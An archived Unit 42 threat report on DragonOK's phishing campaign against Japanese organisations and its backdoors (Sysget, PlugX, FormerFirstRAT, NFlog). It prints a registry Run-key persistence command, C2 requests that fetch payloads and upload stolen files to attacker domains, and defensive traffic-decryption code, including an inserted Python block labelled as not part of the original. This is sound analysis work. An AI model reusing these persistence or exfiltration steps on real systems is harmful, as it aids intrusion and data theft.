{
	"id": "bbd4970b-4516-4c9a-a318-44763d2cb3f2",
	"created_at": "2026-04-06T00:22:37.894624Z",
	"updated_at": "2026-04-10T03:34:17.288862Z",
	"deleted_at": null,
	"sha1_hash": "5a43b8909311e74a21a8fa537636dd793c8a23f7",
	"title": "Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 792250,
	"plain_text": "Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against\r\nJapanese Targets\r\nBy Jen Miller-Osborn, Josh Grunzweig\r\nPublished: 2015-04-14 · Archived: 2026-04-05 17:26:28 UTC\r\nSummary\r\nPalo Alto Networks Unit 42 used the AutoFocus threat intelligence service to identify a series of phishing attacks against\r\nJapanese organizations. Using AutoFocus to quickly search and correlate artifacts across the collective set of WildFire and\r\nother Palo Alto Networks threat intelligence, we were able to associate the attacks with the group publicly known as\r\n“DragonOK.” [1] These attacks took place between January and March of 2015.\r\nDragonOK has previously targeted Japanese high-tech and manufacturing firms, but we’ve identified a new backdoor\r\nmalware, named “FormerFirstRAT,” deployed by these attackers. See the “Malware Details” section for analysis of the three\r\nRATs and two additional backdoors deployed in this persistent attack campaign.\r\nCampaign Details\r\nThis campaign involved five separate phishing attacks, each carrying a different variant of Sysget malware, also known as\r\nHelloBridge. The malware was included as an attachment intended to trick the user into opening the malware. This included\r\naltering the icon of the executable to appear as other file types (Figure 1) as well as decoy documents to trick users into\r\nthinking they had opened a legitimate file.\r\nFigure 1. Icons used by malicious Sysget attachments.\r\nAll of the Sysget files used in this campaign communicate with a single command and control (C2) server, hosted at\r\nbiosnews[.]info. Sysget communicates with this server using the HTTP protocol; see the Malware Details section for\r\nspecifics of the command and control traffic. All five phishing campaigns targeted a Japanese manufacturing firm over the\r\ncourse of two months, but the final campaign also targeted a separate Japanese high-tech organization. (Figure 2)\r\nFigure 2. 
Five Sysget samples used to target two Japanese organizations.\r\nFour of the five Sysget variants included a decoy document to convince users that they had opened a legitimate file rather than malware. Two of the executables used decoy documents containing obituaries: Figure 3 shows a GIF file with an obituary notice for a woman, while Figure 4 shows a Microsoft Word document with the obituary of a man.\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 1 of 10\r\nFigure 3. Japanese decoy document containing an obituary notice for a woman.\r\nFigure 4. Japanese decoy document containing an obituary notice for a man.\r\nThe Sysget sample with a PDF icon created a second executable, named Adobe.exe, which simply displayed the following warning.\r\nFigure 5. Error message generated by Adobe.exe\r\nThe final Sysget sample used a Microsoft Excel icon and opened an Excel document whose cells were filled with “XXXXXX.” (Figure 6)\r\nFigure 6. Excel spreadsheet with Xs in multiple rows and columns.\r\nThese Sysget variants appear to be the first-stage payload in these attacks. During analysis we identified five additional backdoor tools hosted on biosnews[.]info which the Sysget variants may download once the attackers have established a foothold.\r\nThree of the backdoors, NFlog, PoisonIvy, and NewCT, have previously been publicly associated with DragonOK. The actors have now also added the popular PlugX backdoor to their toolkit. The fifth backdoor appears to be a new, custom-built tool that we have not previously associated with DragonOK or any other attack group. 
We’ve named this tool “FormerFirstRAT” because that appears to be the name its developers use for it. Figure 7 shows the relationship between these backdoors and their respective command and control servers.\r\nFigure 7. Relationship between five additional backdoors used by DragonOK and their C2 servers in this campaign.\r\nThe following section details the functionality of the malware deployed in this campaign.\r\nMalware Details\r\nSysget/HelloBridge\r\nIn this campaign, Sysget samples were attached to e-mails and used various icons to trick users into infecting their systems. The majority of these samples are self-extracting executables that contain a malicious downloader along with a legitimate file. When the self-extracting executable is launched, the downloader and the legitimate file are typically dropped in one of the following directories and then executed:\r\n%PROGRAMFILES%\r\n%WINDIR%\\Temp\r\nWhen the malicious downloader is executed, it begins by creating the 'mcsong[]' event in order to ensure that only one instance is running. It then spawns a new instance of 'C:\\windows\\system32\\cmd.exe' with a window name of 'Chrome-Update', obtains a handle to that window with the FindWindowW API call, and sends the following command to the window. This lets the malware execute a command indirectly, inside the cmd.exe process rather than its own:\r\nreg add hkcu\\software\\microsoft\\windows\\currentversion\\run /v netshare /f /d %temp%\\notilv.exe /t REG_EXPAND_SZ\r\nThis Run key ensures that the copy of itself the malware later writes to %temp%\\notilv.exe persists across reboots. It then sends the 'exit' command to the same window, which terminates that cmd.exe process.\r\nThe malware then attempts to read the following file. 
This file is used to store a key that is later used to decrypt data received during network communications:\r\n%temp%\\ibmCon6.tmp\r\nIf the file does not exist, it will make the following GET request:\r\nGET /index.php?fn=s4\u0026name=4890c2d546fa48a536b75b48b17de023 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nHost: biosnews[.]info\r\nConnection: Keep-Alive\r\nThe fn and name parameters are hard-coded in the above request. The server responds with data similar to the following:\r\nHTTP/1.1 200 OK\r\nDate: Wed, 11 Mar 2015 00:14:14 GMT\r\nServer: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev\r\nX-Powered-By: PHP/5.4.37\r\nKeep-Alive: timeout=5\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n\r\n17\r\ngh204503254\r\n1916733707\r\n0\r\nThe first two pieces of data ('17' and 'gh204503254') are then written to the ibmCon6.tmp file referenced earlier. Note that '17' is not server-supplied data but the chunk-size line of the chunked response (0x17 = 23 bytes, exactly the length of 'gh204503254', a CRLF and '1916733707'); the key material the malware actually needs is 'gh204503254'.\r\nThe malware then copies itself to the %TEMP% directory under the name 'notilv.exe'. Because of the previously written Run key, this copy will execute when the machine is restarted and the current user logs in.\r\nThe malware then makes the following request:\r\nGET /index.php?fn=s1\u0026uid=fc1a8359e0f4cb8d60920dc066b8b21c HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nHost: biosnews[.]info\r\nConnection: Keep-Alive\r\nThe fn and uid parameters are hard-coded in the above request. The response data is decrypted using the RC4 stream cipher, with the previously downloaded 'gh204503254' value as the key material. 
The following Python code (using the wincrypto package, which reproduces the CryptoAPI key-derivation and cipher behaviour the malware relies on) can be used for decryption with the 'gh204503254' key:\r\nimport pprint as pp\r\nfrom wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt\r\nCALG_RC4 = 0x6801\r\nCALG_MD5 = 0x8003\r\nfinal_data = b'...'  # body of the s1 response, as received\r\n# RC4 key = CryptDeriveKey over the MD5 of the downloaded key material\r\nmd5_hasher = CryptCreateHash(CALG_MD5)\r\nCryptHashData(md5_hasher, 'gh204503254')\r\nrc4_key = CryptDeriveKey(md5_hasher, CALG_RC4)\r\ndecrypted_data = CryptDecrypt(rc4_key, final_data)\r\npp.pprint(decrypted_data)\r\nAt this stage, the remote server can send a number of different responses. The following example response instructs the malware to download a remote executable file:\r\nsys getinto \"filename.exe\" \"01234567890123456789012345678901\";\\n\r\n'filename.exe' is the path where the downloaded file will be stored, and '01234567890123456789012345678901' is the value supplied in the subsequent HTTP request. When this command is received, the following example request is made:\r\nGET /index.php?fn=s3\u0026file=01234567890123456789012345678901 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nHost: biosnews[.]info\r\nConnection: Keep-Alive\r\nAt this point, the remote server responds with an unencrypted file that the malware saves to the given path.\r\nThe remote server can also send the following example response. 
This response instructs the malware to upload the specified file:\r\nsys upto \"filename.exe\";\\n\r\nAn example upload request can be seen below:\r\nPOST /index.php?fn=s2\u0026item=70efdf2ec9b086079795c442636b55fb HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nContent-Type: multipart/form-data; boundary=---------------------------d5340oqbasdfaa\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nHost: biosnews[.]info\r\nContent-Length: 115126\r\nConnection: Keep-Alive\r\n\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"file\"; filename=\"calc_malware.exe\"\r\nContent-Type: application/octet-stream\r\n\r\n[BINARY_DATA]\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n70efdf2ec9b086079795c442636b55fb\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nSubmit\r\n-----------------------------d5340oqbasdfaa--\r\nThe remote server can also send the following example response. This response will instruct the malware to execute the given command:\r\nThe results of this execution are stored in a temporary text file in the %TEMP% directory. These results are encrypted using the same technique described previously. 
An example upload of these results can be seen below:\r\nPOST /index.php?fn=s2 HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nContent-Type: multipart/form-data; boundary=---------------------------d5340oqbasdfaa\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nHost: biosnews[.]info\r\nContent-Length: 1609\r\nConnection: Keep-Alive\r\n\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"file\"; filename=\"C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\.txt\"\r\nContent-Type: application/octet-stream\r\n\r\n[BINARY_DATA]\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n70efdf2ec9b086079795c442636b55fb\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nSubmit\r\n-----------------------------d5340oqbasdfaa--\r\nPlugX\r\nPlugX is a backdoor that is often used by actors in targeted attacks. This version of PlugX attempts to disguise itself as a Symantec product. The following icon is present in this sample:\r\nFigure 8. PlugX file uses Symantec logo icon.\r\nUpon execution, the malware installs itself as a service with the following parameters:\r\nService Name: RasTls\r\nService Display Name: RasTls\r\nService Description: Symantec 802.1x Supplicant\r\nIt may also set the following registry key for persistence:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RasTls - %windir%\\system32\\svchost.exe\r\nPlugX is a well-studied malware family with a long history of use in targeted attacks. 
More information on its history is available at the following links.\r\nhttps://www.fireeye.com/blog/threat-research/2014/07/pacific-ring-of-fire-plugx-kaba.html\r\nhttp://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf\r\nhttps://www.blackhat.com/docs/asia-14/materials/Haruyama/Asia-14-Haruyama-I-Know-You-Want-Me-Unplugging-PlugX.pdf\r\nFormerFirstRAT\r\nThis remote administration tool (RAT) is referred to as “FormerFirstRAT” by its authors. FormerFirstRAT communicates using plain HTTP (no TLS) over port 443, encrypting only the request body itself; such port/protocol mismatches are not uncommon in targeted attack campaigns, and cleartext HTTP on a port normally reserved for TLS is itself a useful indicator of malicious activity.\r\nWhen the malware starts, it writes the following registry value to ensure persistence:\r\n[HKCU|HKLM]\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WmdmPmSp -\u003e EXE or DLL path\r\nThe malware then sends an HTTP POST request with information about the victim system. The following information is collected:\r\nVictim IP address\r\nUsername\r\nAdministrative privileges\r\nRAT status (active/sleep)\r\nRAT version (in this case, 0.8)\r\nMicrosoft Windows version\r\nUserID (Volume Serial followed by an underscore and a series of '1's)\r\nLanguage\r\nThe following settings are used for command and control:\r\nHostname: https.reweblink.com\r\nPort: 443\r\nTimer: 180000\r\nMethod: POST\r\nThe malware encrypts network communication with AES-128, deriving the key from the MD5 of 'tucwatkins' via CryptDeriveKey. All data is sent via HTTP POST requests. While not a distinct TTP, the author of this malware may be a soap-opera fan. 
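The wincrypto snippets on this page lean on that package to mimic CryptoAPI. The following Python, added here as an example and not part of the Unit 42 post, re-implements the CryptDeriveKey derivation with the standard library alone and applies it to both channels described on this page: the RC4 key Sysget derives from the 'gh204503254' value fetched with fn=s4, and the AES-128 key FormerFirstRAT derives from 'tucwatkins'. It then walks one constructed Sysget exchange end to end: dechunking an s4 reply shaped like the capture above, deriving the RC4 key, decrypting an s1 tasking reply and parsing the 'sys getinto' command out of it. Assumptions, also marked in the comments: the s1 ciphertext is constructed by encrypting a command of the documented shape, because the post prints no ciphertext; the RC4 key size is taken as 128 bits (the Base Provider would give 40 bits plus zero salt); the AES expansion step follows the CryptDeriveKey documentation on MSDN; and the AES-CBC helper needs pycryptodome, which is not in the standard library.

```python
import hashlib

CRLF = bytes([13, 10])     # HTTP line ending, built without escape sequences
DQUOTE = chr(34)           # the double-quote character used around arguments


def crypt_derive_key(secret, key_bits, expand):
    # Re-implements CryptoAPI CryptDeriveKey() over an MD5 base hash.
    # expand=False (RC4): the key is the leading key_bits/8 bytes of MD5(secret).
    # expand=True (AES or 3DES from a non-SHA-2 hash, per MSDN): XOR the digest
    # into 64-byte 0x36 and 0x5c pads, hash each pad, concatenate, truncate.
    digest = hashlib.md5(secret).digest()
    if expand:
        pad36 = bytes(b ^ 0x36 for b in digest) + bytes([0x36]) * (64 - len(digest))
        pad5c = bytes(b ^ 0x5C for b in digest) + bytes([0x5C]) * (64 - len(digest))
        digest = hashlib.md5(pad36).digest() + hashlib.md5(pad5c).digest()
    return digest[:key_bits // 8]


def sysget_rc4_key(secret, key_bits=128):
    # Sysget: CryptDeriveKey(MD5(secret), CALG_RC4).  The key size depends on the
    # CSP the sample opened: 128 bits with the Enhanced Provider, 40 bits with the
    # Base Provider, which pads the key with 88 bits of zero salt.  128 bits is an
    # assumption here; pass key_bits=40 to try the Base Provider variant.
    key = crypt_derive_key(secret, key_bits, expand=False)
    return key + bytes(16 - len(key))


def formerfirstrat_aes_key():
    # FormerFirstRAT: CryptDeriveKey(MD5('tucwatkins'), CALG_AES_128).
    return crypt_derive_key(b'tucwatkins', 128, expand=True)


def rc4(key, data):
    # Plain RC4 (KSA + PRGA); encryption and decryption are the same operation.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def aes_cbc_decrypt(key, data):
    # CryptDecrypt() defaults for block ciphers: CBC, zero IV, PKCS#5 padding.
    # Requires pycryptodome (assumption; not part of the standard library).
    from Crypto.Cipher import AES
    plain = AES.new(key, AES.MODE_CBC, iv=bytes(16)).decrypt(data)
    return plain[:-plain[-1]]


def dechunk(body):
    # Minimal HTTP/1.1 chunked-transfer decoder: the s4 reply is chunked, so the
    # '17' in the capture is a chunk size (0x17 = 23 bytes), not server data.
    out = bytearray()
    while True:
        size_line, _, body = body.partition(CRLF)
        size = int(size_line.split(b';')[0], 16)
        if size == 0:
            return bytes(out)
        out += body[:size]
        body = body[size + 2:]          # skip the chunk's trailing CRLF


def parse_s4(body):
    # The de-chunked s4 payload is two CRLF-separated lines: the RC4 key material
    # ('gh204503254' in the capture) and a second value the post does not explain.
    secret, _, rest = dechunk(body).partition(CRLF)
    return secret, rest.strip()


def parse_command(plaintext):
    # Decrypted s1 replies look like   sys getinto <path> <file-id>;   with the
    # arguments double-quoted; returns (verb, [arguments]).
    text = plaintext.decode('latin-1').strip().rstrip(';')
    head, *rest = text.split(DQUOTE)
    words = head.split()
    if len(words) != 2 or words[0] != 'sys' or len(rest) % 2:
        raise ValueError('not a Sysget command: %r' % text)
    return words[1], rest[0::2]


def demo():
    # Constructed s4 body, shaped like the capture in the post.
    s4_body = b'17' + CRLF + b'gh204503254' + CRLF + b'1916733707' + CRLF + b'0' + CRLF + CRLF
    secret, _ = parse_s4(s4_body)
    key = sysget_rc4_key(secret)
    # Constructed s1 ciphertext: the post prints none, so a command of the
    # documented shape is encrypted with the same key.
    command = ('sys getinto ' + DQUOTE + 'filename.exe' + DQUOTE + ' '
               + DQUOTE + '01234567890123456789012345678901' + DQUOTE + ';')
    s1_body = rc4(key, command.encode('latin-1'))
    verb, args = parse_command(rc4(key, s1_body))
    return secret, verb, args


if __name__ == '__main__':
    print(demo())
    print(formerfirstrat_aes_key().hex())
```

Run demo() to see the constructed exchange resolve to the verb 'getinto' with the path and file identifier as arguments; formerfirstrat_aes_key() gives the 16-byte key to hand to aes_cbc_decrypt() on a captured FormerFirstRAT POST body. If a real Sysget s1 reply does not decrypt to a readable 'sys ...' line with the 128-bit key, retry with key_bits=40, which is what a sample that acquired the Base Provider would have used.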
The following code demonstrates how you can decrypt the malware communications using Python (again via the wincrypto package; CryptDecrypt with an AES key uses CryptoAPI's defaults of CBC mode, a zero IV and PKCS#5 padding):\r\nfrom wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt\r\nCALG_AES_128 = 0x660e\r\nCALG_MD5 = 0x8003\r\ndata = \"...\"  # encrypted POST body, as captured\r\n# AES-128 key = CryptDeriveKey over the MD5 of the hard-coded string\r\nmd5_hasher = CryptCreateHash(CALG_MD5)\r\nCryptHashData(md5_hasher, 'tucwatkins')\r\naes_key = CryptDeriveKey(md5_hasher, CALG_AES_128)\r\ndecrypted_data = CryptDecrypt(aes_key, data)\r\nThe malware then enters a loop in which it sends periodic requests to the remote server, which may respond with instructions for the RAT. We have identified the following functionalities:\r\nModify sleep timer between requests\r\nExecute a command and return the command output\r\nBrowse the file system\r\nDownload files\r\nDelete files\r\nExfiltrate victim information\r\nAn example HTTP POST request can be seen below.\r\nPOST / HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: https.reweblink.com:443\r\nContent-Length: 48\r\nCache-Control: no-cache\r\n\r\n[encrypted binary data]\r\nNFlog\r\nWhen loaded inside a running process, NFlog begins by spawning a new thread, which is responsible for all malicious activity produced by this DLL. Initially, the malware sets the following registry value:\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\update : [current_executable_filename]\r\nwhere [current_executable_filename] is the path of the currently running executable, acquired via a call to GetModuleFileNameA. This Run value ensures that the malware persists across reboots when the current user logs in.\r\nMultiple string obfuscation routines are included in this malware sample. 
Strings contained in the binary are decrypted via a simple XOR against the single-byte key 0x25.\r\nThe malware then creates a named event object, 'GoogleZCM', and uses it to ensure that only one instance of the malware runs at a time.\r\nThe malware then attempts to bind to the local host on port 1139.\r\nThe malware checks Internet connectivity by making a request to www.microsoft.com. An example request is shown below.\r\nGET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)\r\nHost: www.microsoft.com\r\nCache-Control: no-cache\r\nCookie: WT_NVR=0=/:1=genuine:2=genuine/validate; MC1=GUID=aa8ac5ed26b9bf4f8d3bd1b2dcaa82f6\u0026HASH=edc5\u0026LV=201503\u0026V=4\u0026LU\r\nfd8c6b7df7c3:lv=1427375812454:ss=1427375780673;\r\noptimizelySegments=%7B%222130980600%22%3A%22true%22%2C%222098371093%22%3A%22true%22%2C%22223040836%22%3A%22se\r\noptimizelyEndUserId=oeu1427379528348r0.49006120319115387; MUID=07660815420F6D5B2DCC0F63434A6C60\r\n%3\r\nSource: http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/"
	],
	"report_names": [
		"unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets"
	],
	"threat_actors": [
		{
			"id": "5ffe400c-6025-44c2-9aa1-7c34a7a192b0",
			"created_at": "2023-01-06T13:46:38.469688Z",
			"updated_at": "2026-04-10T02:00:02.987949Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"Moafee",
				"BRONZE OVERBROOK",
				"G0017",
				"G0002",
				"Shallow Taurus"
			],
			"source_name": "MISPGALAXY:DragonOK",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7ebda3c6-1789-4d84-97cf-47fb18a0cb28",
			"created_at": "2022-10-25T15:50:23.78829Z",
			"updated_at": "2026-04-10T02:00:05.415039Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"DragonOK"
			],
			"source_name": "MITRE:DragonOK",
			"tools": [
				"PoisonIvy",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "593dd07d-853c-46cd-8117-e24061034bbf",
			"created_at": "2025-08-07T02:03:24.648074Z",
			"updated_at": "2026-04-10T02:00:03.625859Z",
			"deleted_at": null,
			"main_name": "BRONZE OVERBROOK",
			"aliases": [
				"Danti ",
				"DragonOK ",
				"Samurai Panda ",
				"Shallow Taurus ",
				"Temp.DragonOK "
			],
			"source_name": "Secureworks:BRONZE OVERBROOK",
			"tools": [
				"Aveo",
				"DDKONG",
				"Godzilla Webshell",
				"HelloBridge",
				"IsSpace",
				"NFLog Trojan",
				"PLAINTEE",
				"PlugX",
				"Rambo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "340d1673-0678-4e1f-8b75-30da2f65cc80",
			"created_at": "2022-10-25T16:07:23.552036Z",
			"updated_at": "2026-04-10T02:00:04.653109Z",
			"deleted_at": null,
			"main_name": "DragonOK",
			"aliases": [
				"Bronze Overbrook",
				"G0017",
				"Shallow Taurus"
			],
			"source_name": "ETDA:DragonOK",
			"tools": [
				"Agent.dhwf",
				"CT",
				"Chymine",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Gen:Trojan.Heur.PT",
				"HTran",
				"HUC Packet Transmit Tool",
				"HelloBridge",
				"IsSpace",
				"KHRAT",
				"Kaba",
				"Korplug",
				"Mongall",
				"NFlog",
				"NewCT",
				"NfLog RAT",
				"PlugX",
				"Poison Ivy",
				"Rambo",
				"RedDelta",
				"SPIVY",
				"Sogu",
				"SysGet",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"TidePool",
				"Xamtrav",
				"brebsd",
				"ffrat",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434957,
	"ts_updated_at": 1775792057,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5a43b8909311e74a21a8fa537636dd793c8a23f7.pdf",
		"text": "https://archive.orkl.eu/5a43b8909311e74a21a8fa537636dd793c8a23f7.txt",
		"img": "https://archive.orkl.eu/5a43b8909311e74a21a8fa537636dd793c8a23f7.jpg"
	}
}